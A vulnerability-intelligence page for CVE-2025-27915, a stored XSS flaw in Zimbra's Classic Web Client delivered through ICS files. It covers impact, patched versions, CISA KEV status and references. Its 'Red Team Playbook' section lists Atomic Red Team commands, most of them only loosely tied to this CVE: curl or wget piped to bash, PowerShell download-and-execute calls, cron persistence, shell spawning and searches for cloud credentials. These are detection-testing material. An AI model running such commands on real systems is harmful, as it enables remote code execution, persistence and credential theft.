CVE-2025-27915
Overview
This vulnerability is a stored cross-site scripting (XSS) flaw arising from insufficient sanitization of HTML content within ICS calendar files processed by the Classic Web Client of Zimbra Collaboration Suite versions 9.0, 10.0, and 10.1. The root cause lies in the improper handling of embedded JavaScript triggered by the ontoggle event inside the <details> HTML tag when rendering ICS file contents in email messages. This flaw affects the email rendering component responsible for displaying calendar invitations and related ICS data.
Vulnerability Description
An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A stored cross-site scripting (XSS) vulnerability exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS files. When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a <details> tag. This allows an attacker to run arbitrary JavaScript within the victim's session, potentially leading to unauthorized actions such as setting e-mail filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim's account, including e-mail redirection and data exfiltration.
Impact
An attacker with a valid user account can leverage this vulnerability to execute arbitrary JavaScript in the context of the victim's session by sending a crafted ICS file via email. This enables unauthorized actions such as modifying email filters to redirect incoming messages to attacker-controlled addresses and exfiltrating sensitive data. The attack requires the victim to open or preview the malicious email, making user interaction necessary. Successful exploitation can lead to account compromise, data leakage, and manipulation of user mailbox settings, impacting confidentiality and user trust.
Solution
Zimbra has released security fixes addressing this vulnerability in versions 10.1.5 and 10.0.13, as documented in their security center and release notes. Administrators should upgrade affected Zimbra Collaboration Suite instances to at least version 10.1.5 or 10.0.13 to remediate the issue. Detailed patch instructions and advisories are available at https://wiki.zimbra.com/wiki/Security_Center and the respective version release pages. No specific workarounds are documented; applying the vendor-provided patches is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A stored cross-site scripting (XSS) vulnerability has been identified in the Classic Web Client of Zimbra Collaboration Suite versions 9.0, 10.0, and 10.1. This vulnerability arises from inadequate sanitization of HTML content within ICS files, which are commonly used for calendar data. When a user opens an email containing a malicious ICS entry, the embedded JavaScript can execute through an ontoggle event within a <details> HTML tag. This allows attackers to run arbitrary JavaScript code in the context of the victim's session, potentially leading to unauthorized actions such as altering email filters or redirecting messages to an attacker-controlled address.
The attack vector for this vulnerability is primarily through phishing emails that contain specially crafted ICS files. An attacker can exploit this weakness by sending an email with a malicious ICS attachment to a target user. Once the user views the email and interacts with the ICS file, the malicious JavaScript executes, granting the attacker the ability to manipulate the victim's email account. This could include actions such as changing email forwarding settings, accessing sensitive information, or even sending further phishing emails from the compromised account. The simplicity of this attack vector makes it particularly concerning, as it relies on social engineering rather than complex technical skills.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on Zimbra Collaboration Suite for their email and collaboration needs. Successful exploitation could lead to unauthorized access to sensitive data, including confidential communications and personal information. Furthermore, the ability to redirect emails could facilitate further attacks, such as business email compromise (BEC), where attackers impersonate legitimate users to conduct fraudulent transactions. The business risk extends beyond immediate data loss; it can also result in reputational damage, regulatory fines, and loss of customer trust, particularly if sensitive information is exposed.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating the Zimbra Collaboration Suite to the latest versions is crucial, as software vendors typically release patches to address known vulnerabilities. Additionally, organizations should deploy web application firewalls (WAFs) that can help identify and block malicious scripts before they reach end users. User education is also vital; training employees to recognize phishing attempts and suspicious email attachments can significantly reduce the likelihood of successful exploitation. Furthermore, employing email filtering solutions that scan for potentially harmful content can provide an additional layer of defense against such attacks.
In conclusion, the stored XSS vulnerability in the Zimbra Collaboration Suite presents a serious threat that can be exploited through relatively straightforward means. The potential for unauthorized actions and data exfiltration underscores the importance of robust security practices, including timely software updates, user awareness training, and the deployment of advanced security technologies. Organizations must remain vigilant and proactive in their cybersecurity strategies to mitigate the risks associated with this and similar vulnerabilities.
Recent updates to the Exploit Prediction Scoring System (EPSS) for CVE-2025-27915 indicate a moderate increase in the likelihood of exploitation, with the score rising by approximately 14%. This upward adjustment reflects evolving attacker interest or improved feasibility of leveraging the stored XSS vulnerability in Zimbra Collaboration Suite’s Classic Web Client. Although no new exploit techniques or active campaigns have been detected by our telemetry, the elevated EPSS score suggests that threat actors may be increasingly prioritizing this vector, potentially due to its ability to execute arbitrary JavaScript within authenticated user sessions. For defenders, this shift underscores the need for heightened vigilance around email and calendar data handling, as well as monitoring for anomalous script execution patterns. While the overall threat level remains medium, the increased EPSS percentile—now approaching the upper quartile—signals a growing risk that could accelerate if proof-of-concept exploits or ransomware actors begin to incorporate this vulnerability into their toolsets.
Affected Products (47)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Synacor | Zimbra Collaboration Suite | All |
cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | All |
cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:-:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p1:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p10:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p11:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p12:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p13:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p14:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p15:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p16:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p17:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p18:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p19:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p2:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p20:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p21:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p22:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p23:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p24:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-27915 |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Security_Center |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.5#Security_Fixes |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.13#Security_Fixes |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P44#Security_Fixes |
| strikeready.com |
NVD API
Exploit
Third Party Advisory
|
https://strikeready.com/blog/0day-ics-attack-in-the-wild/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-27915 |